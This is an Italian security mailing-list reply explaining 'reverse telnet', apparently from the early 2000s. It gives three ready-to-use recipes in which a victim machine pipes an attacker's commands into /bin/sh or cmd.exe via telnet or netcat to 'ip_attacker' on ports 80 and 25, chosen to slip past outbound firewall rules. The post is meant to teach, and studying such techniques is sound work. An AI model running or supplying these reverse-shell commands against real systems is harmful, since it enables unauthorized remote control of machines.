Re: Problemi di reverse telnet

==>Ing. Fabio Bara' Cappuccio

>sarei interessato a conoscere i problemi legati al reverse telnet
>(anche una breve descrizione di cosa sia lo stesso)
[snip]

==> Koba

[snip]
>e cosa intendi per reverse telnet? qualcosa
>(attacco, backdoor, etc.) che si connette dalla tua lan/dmz/macchina/etc
>verso l'esterno?
[snip]



Il telnet inverso e' una metodologia "raffinata" ma vecchiotta (si usava 
qualke anno fa ;) per aprire una sh# su di un sistema generando una canale 
di comunicazioni appunto inverso... mi spiego:

=> Possibilita' 0x01)

[attacker]# nc -v -l -n -p 80
[attacker]# nc -v -l -n -p 25

[vittima]# telnet ip_attacker 80 | /bin/sh | telnet ip_attacker 25

/* penso sia chiara la funzionalita'... ovvero la vittima si connette 
all'attacker, il quale passera' dei comandi che tramite la pipe verranno 
eseguiti da /bin/sh , e successivamente l'output dei suddetti passato alla 
25 dell'attacker che in questo modo sapra' se sono andati bene */

=> Possibilita' 0x02)

[attacker]# nc -v -l -n -p 80
[attacker]# nc -v -l -n -p 25

[vittima]# nc -e /bin/sh ip_attacker 80 | nc ip_attacker 25


=> Possibilita' 0x03) Windoze

[attacker]# nc -v -l -n -p 80
[attacker]# nc -v -l -n -p 25

[vittima]-> c:\> nc ip_attacker 80 | cmd.exe | nc ip_attacker 25

Venivano/vengono di solito usate le porte 25 e 80 in quanto non soggette a 
controlli in uscita a meno di impostazioni paranoid o quasi dei firewall...

Spero di essere stato esauriente.


Regards,

..::SNHYPER::..
"Security developer"
Linux registered { user #249109, machine #133922 };
Security Checkpoint -> http://snhyper.owns.it
PGP Key Fingerprint= CB BB FC B2 43 69 2E 9C 27 9F C5 40 C3 F3 18 1A


_________________________________________________________________
MSN Hotmail è il provider email più grande al mondo… cosa aspetti a farti un 
account? http://www.hotmail.it


________________________________________________________
http://www.sikurezza.org - Italian Security Mailing List